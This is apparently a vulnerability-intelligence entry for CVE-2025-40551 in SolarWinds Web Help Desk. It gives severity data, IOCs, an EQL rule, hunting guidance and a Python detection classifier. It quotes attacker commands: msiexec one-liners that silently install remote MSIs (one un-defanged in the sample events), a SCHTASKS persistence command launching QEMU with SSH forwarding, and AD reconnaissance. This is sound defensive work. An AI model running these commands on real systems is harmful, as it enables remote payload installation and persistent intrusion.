CVE-2025-40551
published 2026-01-28


Priority: P1 (score 97), critical
CVSS 3.1 base score: 9.8 (critical), vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CISA Known Exploited Vulnerability (KEV): listed, remediation due 2026-02-06
Exploited in the wild: yes
EPSS: 84.13% (99.7th percentile)
SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

Affected (10 ranges)

Vendor      Product                                 Version range   Fixed in
msrc        azl3_shim_15.4-2_on_azure_linux_3.0     -               -
msrc        azl3_shim_15.8-5_on_azure_linux_3.0     -               -
msrc        azure_linux_3.0_arm                     -               -
msrc        azure_linux_3.0_x64                     -               -
msrc        cbl2_shim_15.4-2_on_cbl_mariner_2.0     -               -
msrc        cbl2_shim_15.8-1_on_cbl_mariner_2.0     -               -
msrc        cbl_mariner_2.0_arm                     -               -
msrc        cbl_mariner_2.0_x64                     -               -
solarwinds  web_help_desk                           < 2026.1        2026.1
solarwinds  web_help_desk                           (unspecified)   -

Note: the msrc rows describe Azure Linux / CBL-Mariner shim packages, not SolarWinds Web Help Desk builds; use only the solarwinds rows (and the 12.8.8 HF1 note under Detection) to scope WHD patching.

Detection & IOCs (extracted from sources)

url       hxxps://files.catbox[.]moe/tmp9fc.msi
url       hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/v4.msi
domain    files.catbox[.]moe
domain    vdfccjpnedujhrzscjtq.supabase[.]co
filename  tmp9fc.msi
filename  v4.msi
filename  qemu-system-x86_64.exe
port      22022
command   msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi
command   msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/v4.msi
command   SCHTASKS /CREATE /V1 /RU SYSTEM /SC ONSTART /F /TN "TPMProfiler" /TR "C:\Users\\tmp\qemu-system-x86_64.exe -m 1G -smp 1 -hda vault.db -device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::22022-:22"
process   wrapper.exe -> java.exe -> cmd.exe
path      C:\Program Files\WebHelpDesk\*\java.exe
path      C:\Program Files (x86)\WebHelpDesk\*\java.exe
path      C:\Users\\tmp\qemu-system-x86_64.exe
other     TPMProfiler (scheduled task name)
path      \Device\Mup\*
Detection rule (EQL)
any where host.os.type == "windows" and (
(event.category == "library" and
process.executable : ("C:\\Program Files\\WebHelpDesk\\*\\java.exe", "C:\\Program Files (x86)\\WebHelpDesk\\*\\java.exe") and
(dll.path : "\\Device\\Mup\\*" or dll.code_signature.trusted == false or ?dll.code_signature.exists == false)) or
(event.category == "process" and process.name : ("cmd.exe", "powershell.exe", "rundll32.exe") and
process.parent.executable : ("C:\\Program Files\\WebHelpDesk\\*\\java*.exe", "C:\\Program Files (x86)\\WebHelpDesk\\*\\java*.exe"))
)
  • Monitor for cmd.exe, powershell.exe, or rundll32.exe spawned as child processes of java.exe located under C:\Program Files\WebHelpDesk\ or C:\Program Files (x86)\WebHelpDesk\; this is the initial exploitation shell chain (wrapper.exe -> java.exe -> cmd.exe).
  • Alert on DLL loads by WebHelpDesk java.exe where the DLL path starts with \Device\Mup\ (a UNC/network path) or the DLL's code signature is reported as untrusted (dll.code_signature.trusted == false) or not present (dll.code_signature.exists == false); this indicates remote DLL loading post-exploitation. Note that the rule's ?dll.code_signature.exists clause matches only an explicit false, not a missing field.
  • Hunt for creation of a scheduled task named 'TPMProfiler' running as SYSTEM on startup, executing qemu-system-x86_64.exe with SSH port-forwarding arguments (hostfwd=tcp::22022-:22).
  • Detect QEMU (qemu-system-x86_64.exe) running from a user temp directory (C:\Users\*\tmp\) with network device arguments; this indicates SSH tunnel establishment for persistent access.
  • Monitor for Cloudflared (Cloudflare Tunnel client) being silently installed via msiexec from a remote GitHub URL, used by threat actors for encrypted C2 tunneling. The msiexec commands listed above pull MSIs from files.catbox[.]moe and a supabase[.]co storage bucket, so match on msiexec with any remote URL rather than a single host.
  • Detect the Active Directory reconnaissance command 'net group "domain computers" /do' executed from processes descended from the WebHelpDesk java.exe process tree.
  • Monitor for NTDS.dit access or copy operations on domain controllers following SolarWinds WHD exploitation; threat actors performed DCSync and NTDS.dit extraction for credential dumping.
  • CVE-2025-40551 affects SolarWinds Web Help Desk 12.8.8 HF1 and all previous versions; scope detection and patching efforts accordingly.
  • Attribution of the active exploitation campaigns to CVE-2025-40551 specifically is not yet confirmed; multiple CVEs (CVE-2025-26399, CVE-2025-40536, CVE-2025-40551) may be responsible.
  • Elastic Security Labs had not yet observed direct telemetry for this activity at time of publication; detections are based on Microsoft's external reporting.
  • Velociraptor and Cloudflared are legitimate tools; their installation alone may appear benign in many enterprise environments. Context (parent process, install source URL) is critical for accurate detection.
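The following Python is an added example, not Elastic's rule and not SolarWinds or Microsoft code. It re-implements the EQL query and the hunting bullets above as one classifier over ECS-style endpoint events, so the logic can be tested offline before it is deployed. Assumptions: the ECS field names used in the EQL query, a hypothetical process.ancestry list of ancestor executables for the "descended from the WHD java.exe tree" check, and constructed sample events (usernames, IPs and DLL names are made up; the msiexec URL is the page's IOC with the hxxps defanging undone, as it would appear in real telemetry).

```python
"""Hunt over ECS-style endpoint events for the CVE-2025-40551 post-exploitation
chain. Added example; not Elastic's, SolarWinds' or Microsoft's code.
Assumptions: ECS field names as in the EQL query, a hypothetical
process.ancestry list, and constructed sample events."""
import fnmatch
import re

# Parent-process patterns from the EQL query (java*.exe also covers javaw.exe).
WHD_JAVA = (
    r"C:\Program Files\WebHelpDesk\*\java*.exe",
    r"C:\Program Files (x86)\WebHelpDesk\*\java*.exe",
)
SHELLS = {"cmd.exe", "powershell.exe", "rundll32.exe"}


def _match_any(value, patterns):
    # Windows paths are case-insensitive; fnmatchcase is not, so fold case here.
    v = value.lower()
    return any(fnmatch.fnmatchcase(v, p.lower()) for p in patterns)


def classify(ev):
    """Return the names of every rule the event trips (empty list if none)."""
    hits = []
    cat = ev.get("event.category")
    exe = ev.get("process.executable", "")
    parent = ev.get("process.parent.executable", "")
    cmd = ev.get("process.command_line", "")
    name = exe.rsplit("\\", 1)[-1].lower()

    if cat == "library" and _match_any(exe, WHD_JAVA):
        sig = ev.get("dll.code_signature") or {}
        # Mirrors the EQL: a missing signature field compares as null, not false,
        # so only an explicit exists:false / trusted:false is flagged.
        if (ev.get("dll.path", "").startswith("\\Device\\Mup\\")
                or sig.get("trusted") is False or sig.get("exists") is False):
            hits.append("whd_java_loads_remote_or_unsigned_dll")

    if cat == "process":
        if name in SHELLS and _match_any(parent, WHD_JAVA):
            hits.append("whd_java_spawns_shell")
        if (name == "schtasks.exe" and re.search(r'/TN\s+"?TPMProfiler"?', cmd, re.I)
                and "hostfwd=tcp::22022-:22" in cmd):
            hits.append("schtasks_tpmprofiler_qemu_ssh_forward")
        if (name == "qemu-system-x86_64.exe" and _match_any(exe, [r"C:\Users\*\tmp\*"])
                and re.search(r"-(netdev|device)\b", cmd)):
            hits.append("qemu_from_user_tmp_with_network")
        if name == "msiexec.exe" and re.search(r"/i\s+https?://", cmd, re.I):
            hits.append("msiexec_remote_url_install")
        if (name == "net.exe" and re.search(r'group\s+"domain computers"\s+/do', cmd, re.I)
                and any(_match_any(a, WHD_JAVA) for a in ev.get("process.ancestry", []))):
            hits.append("net_group_domain_computers_from_whd")
    return hits


def hunt(events):
    """Return [(event_index, rule_name), ...] across a batch of events."""
    return [(i, r) for i, ev in enumerate(events) for r in classify(ev)]


WHD = r"C:\Program Files\WebHelpDesk\bin\jre\bin\java.exe"  # assumed install path
SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"event.category": "process", "process.executable": r"C:\Windows\System32\cmd.exe",
     "process.parent.executable": WHD, "process.command_line": "cmd.exe /c whoami"},
    {"event.category": "library", "process.executable": WHD,
     "dll.path": r"\Device\Mup\10.0.0.5\share\loader.dll", "dll.code_signature": {"exists": False}},
    {"event.category": "process", "process.executable": r"C:\Windows\System32\schtasks.exe",
     "process.parent.executable": r"C:\Windows\System32\cmd.exe",
     "process.command_line": r'SCHTASKS /CREATE /V1 /RU SYSTEM /SC ONSTART /F /TN "TPMProfiler" '
                             r'/TR "C:\Users\svc\tmp\qemu-system-x86_64.exe -m 1G -smp 1 -hda vault.db '
                             r'-device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::22022-:22"'},
    {"event.category": "process", "process.executable": r"C:\Users\svc\tmp\qemu-system-x86_64.exe",
     "process.parent.executable": r"C:\Windows\System32\svchost.exe",
     "process.command_line": "qemu-system-x86_64.exe -m 1G -hda vault.db -netdev user,id=net0,hostfwd=tcp::22022-:22"},
    {"event.category": "process", "process.executable": r"C:\Windows\System32\msiexec.exe",
     "process.parent.executable": r"C:\Windows\System32\cmd.exe",
     "process.command_line": "msiexec /q /i https://files.catbox.moe/tmp9fc.msi"},  # page IOC, un-defanged
    {"event.category": "process", "process.executable": r"C:\Windows\System32\net.exe",
     "process.parent.executable": r"C:\Windows\System32\cmd.exe",
     "process.ancestry": [r"C:\Windows\System32\cmd.exe", WHD, r"C:\Program Files\WebHelpDesk\wrapper.exe"],
     "process.command_line": 'net group "domain computers" /do'},
    {"event.category": "process", "process.executable": r"C:\Windows\System32\cmd.exe",  # benign: other JVM
     "process.parent.executable": r"C:\Program Files\Java\jdk-17\bin\java.exe",
     "process.command_line": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for idx, rule in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The last sample event is the false-positive control: a cmd.exe child of a JVM that is not under the WebHelpDesk install path must produce no hits, which is the parent-path context the final bullet above calls critical. The net.exe rule deliberately requires a WebHelpDesk java.exe somewhere in the ancestry, not just as the direct parent, because the reconnaissance command is typically several hops down the shell chain.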

CVSS provenance

Source       Score  Severity  Vector
nvd (v3.1)   9.8    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck    9.8    CRITICAL
cisa         9.8    CRITICAL
vendor_msrc  5.1    MEDIUM

The vendor_msrc score belongs to the msrc (Azure Linux / CBL-Mariner) entries listed under Affected; the 9.8 scores from NVD, VulnCheck and CISA are the ones that describe the SolarWinds Web Help Desk issue.